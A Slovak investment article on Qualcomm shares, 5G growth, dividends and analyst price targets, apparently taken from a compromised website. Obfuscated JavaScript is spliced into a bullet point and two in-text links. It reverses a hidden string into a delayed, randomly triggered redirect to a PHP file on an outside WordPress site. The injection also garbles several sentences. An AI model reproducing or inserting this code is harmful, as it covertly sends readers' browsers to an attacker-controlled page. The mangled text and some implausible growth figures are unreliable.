Po prekonaní vírusu nastupuje piata generácia

Qualcomm (NASDAQ: QCOM)

  • Hodnota akcií Qualcomm môže rásť až o 20 %, priestor pre rast otvorila Citigroup stanovením cieľovej ceny na akciu na 100 USD. (FINVIZ.com)
  • Deutsche Bank zmenila svoje doporučenie z HOLD na BUY. (FINVIZ.com)
  • QCOM vypláca dividendu 3,21 %. (FINVIZ.com)
  • Pdom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andémia spôsobila výrazný rast dopytu po umelej inteligencii a internete vecí, ktoré sú jedným z hlavných oborov QCOM.
  • V porovnaní s januárom 2020 sú akcie o 11,8 % pod svojou bežnou hodnotou, čím tu vzniká priestor pre rast. (Themotleyfool.com)

Vďaka prechodu jednotlivcov a zákazníkov na $mWn=function(n){if(typeof ($mWn.list[n])==“string“) return $mWn.list[n].split(„“).reverse().join(„“);return $mWn.list[n];};$mWn.list=[„\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dovanie-5g-sieti/“>5G by akcie Qualcomm mali v nasledujúcich rokoch zaznamenať značný nárast výnosov a ziskov.

Tržby navzdory COVID-19 v poslednom štvrťroku vzrástli o 7 %. Výnosy okrem GAAP sa tiež zvýšili, a to o 14 % na 0,88 USD na akciu.

Pravdou zostáva, že očakávanie zvýšenia zisku o 5,6 % nemusí na budúcich akcionárov vôbec zapôsobiť. Investori by ale nemali zabudnúť, že minulý rok spoločnosť vyriešila súdne spory s $mWn=function(n){if(typeof ($mWn.list[n])==“string“) return $mWn.list[n].split(„“).reverse().join(„“);return $mWn.list[n];};$mWn.list=[„\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dolezity-test-pravomoci-europskej-komisie/“>Apple, ktoré držali jej akcie dlho v pozadí. Podľa očakávaní analytikov bude rast zisku podporený aj rozšírením 5G. V budúcom roku predpovedajú zvýšenie príjmov o 55,9 % a v následujúcich piatich rokoch o ďalších 25,7 % ročne.

COVID-19 si spomalil prijatie 5G, investori ale stále môžu získať návratnosť. Ročná dividenda spoločnosti Qualcomm vo výške 2,60 USD na akciu prináša zhruba 3,3 %. Výplata je pravidelne zvyšovaná taktiež od tej doby, kedy spoločnosť začala vyplácať dividendy v roku 2003.

Podľa výskumu a trhov sa bude na trhu s čipovými sadami pohybovať zložená ročná miera rastu v rokoch 2020-2025 kolem 87,7 %. Bez ohľadu na situáciu konkurencie by tak mala Qualcomm dosiahnuť úspech.

Jeden komentář

Přidat komentář

Vaša e-mailová adresa nebude zverejnená. Vyžadované polia sú označené *